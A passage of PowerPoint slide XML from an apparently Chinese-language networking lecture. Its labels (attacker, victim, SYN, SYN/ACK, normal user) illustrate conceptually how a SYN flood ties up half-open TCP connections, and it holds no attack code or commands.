                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>半连接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="云形标注 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407988" y="1300510"/>
            <a:ext cx="1887537" cy="1511300"/>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rgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就是让你白等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C0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31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="522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233"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52233"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="522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2229"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52229"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24"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2230"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52230"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="30"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2243"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52243"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="522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236"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52236"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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52239"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52239"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52239"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52239"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">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3" grpId="0"/>
      <p:bldP spid="52233" grpId="0"/>
      <p:bldP spid="52239" grpId="0" animBg="1"/>
      <p:bldP spid="52236" grpId="0"/>
      <p:bldP spid="3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fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{977FD878-6B30-4F3F-89A8-602B4E09D99D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN Flood(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大量请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53252" name="Group 1052"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="2130425"/>
            <a:ext cx="2516187" cy="2508250"/>
            <a:chOff x="-128" y="1968"/>
            <a:chExt cx="1602" cy="1996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36911" name="Picture 105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8" y="1968"/>
              <a:ext cx="1602"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2" name="Text Box 1054"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="240" y="3600"/>
              <a:ext cx="76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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>攻击者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53253" name="Group 1055"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6527800" y="3403600"/>
            <a:ext cx="2276475" cy="3084513"/>
            <a:chOff x="4176" y="1968"/>
            <a:chExt cx="1449" cy="1972"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36909" name="Picture 10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0" name="Text Box 1057"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4512" y="3648"/>
              <a:ext cx="7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a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>受害者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53290" name="AutoShape 1060"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7056438" y="1916113"/>
            <a:ext cx="1822450" cy="1187450"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5083"/>
              <a:gd name="adj2" fmla="val 75639"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>这么多需要处理？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53255" name="Text Box 1062"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2695575" y="5956300"/>
            <a:ext cx="369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kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>不能建立正常的连接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="596900" y="4614863"/>
            <a:ext cx="1820863" cy="1863725"/>
            <a:chOff x="596900" y="4614863"/>
            <a:chExt cx="1820863" cy="1863625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36907" name="Picture 1075" descr="j03012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900" y="4614863"/>
              <a:ext cx="182086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1076"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="738188" y="6021313"/>
              <a:ext cx="1497012" cy="4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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>正常用户</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2447925" y="4827588"/>
            <a:ext cx="3921125" cy="922337"/>
            <a:chOff x="2447925" y="4827588"/>
            <a:chExt cx="3921125" cy="922337"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36903" name="Group 1077"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2447925" y="4897438"/>
              <a:ext cx="3921125" cy="709612"/>
              <a:chOff x="1488" y="1776"/>
              <a:chExt cx="2496" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36905" name="AutoShape 107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ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36906" name="Text Box 1079"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1825" y="1921"/>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kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>正常</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>tcp connect</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36904" name="AutoShape 1080"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4586288" y="4827588"/>
              <a:ext cx="996950" cy="9223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000000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 1081"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="3124200"/>
            <a:ext cx="1465263" cy="404813"/>
            <a:chOff x="1920" y="2160"/>
            <a:chExt cx="923" cy="255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36901" name="Freeform 1082"/>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902" name="Text Box 1083"/>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SYN/ACK</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 1084"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="3276600"/>
            <a:ext cx="1465263" cy="404813"/>
            <a:chOff x="1920" y="2160"/>
            <a:chExt cx="923" cy="255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36899" name="Freeform 1085"/>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900" name="Text Box 1086"/>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SYN/ACK</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 1087"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3429000"/>
            <a:ext cx="1465263" cy="404813"/>
            <a:chOff x="1920" y="2160"/>
            <a:chExt cx="923" cy="255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36897" name="Freeform 1088"/>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98" name="Text Box 1089"/>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SYN/ACK</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 1090"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="2057400"/>
            <a:ext cx="1465263" cy="411163"/>
            <a:chOff x="1525" y="1757"/>
            <a:chExt cx="923" cy="259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36895" name="Freeform 1091"/>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96" name="Text Box 1092"/>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t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 1093"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="2209800"/>
            <a:ext cx="1465263" cy="411163"/>
            <a:chOff x="1525" y="1757"/>
            <a:chExt cx="923" cy="259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36893" name="Freeform 1094"/>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94" name="Text Box 1095"/>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t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 1096"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2362200"/>
            <a:ext cx="1465263" cy="411163"/>
            <a:chOff x="1525" y="1757"/>
            <a:chExt cx="923" cy="259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36891" name="Freeform 1097"/>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92" name="Text Box 1098"/>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t>SYN</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 1099"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2514600"/>
            <a:ext cx="1465263" cy="411163"/>
            <a:chOff x="1525" y="1757"/>
            <a:chExt cx="923" cy="259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36889" name="Freeform 1100"/>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90" name="Text Box 1101"/>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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SYN</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 1102"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="3581400"/>
            <a:ext cx="1465263" cy="404813"/>
            <a:chOff x="1920" y="2160"/>
            <a:chExt cx="923" cy="255"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36887" name="Freeform 1103"/>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ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36888" name="Text Box 1104"/>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000">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>SYN/ACK</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 1106"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2362200"/>
            <a:ext cx="741363" cy="801688"/>
            <a:chOff x="3014" y="720"/>
            <a:chExt cx="467" cy="505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36884" name="Text Box 1107"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3014" y="937"/>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400"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36885" name="Text Box 1108"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="816"/>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400"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="nl-NL" altLang="zh-CN" sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36886" name="Text Box 1109"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3312" y="72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itchFamily="2" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="742950" indent="-285750" defTabSz="762000" eaLnBrk="0" hangingPunct="0">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="762000" eaLnBrk="0" hangingPunct="0">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
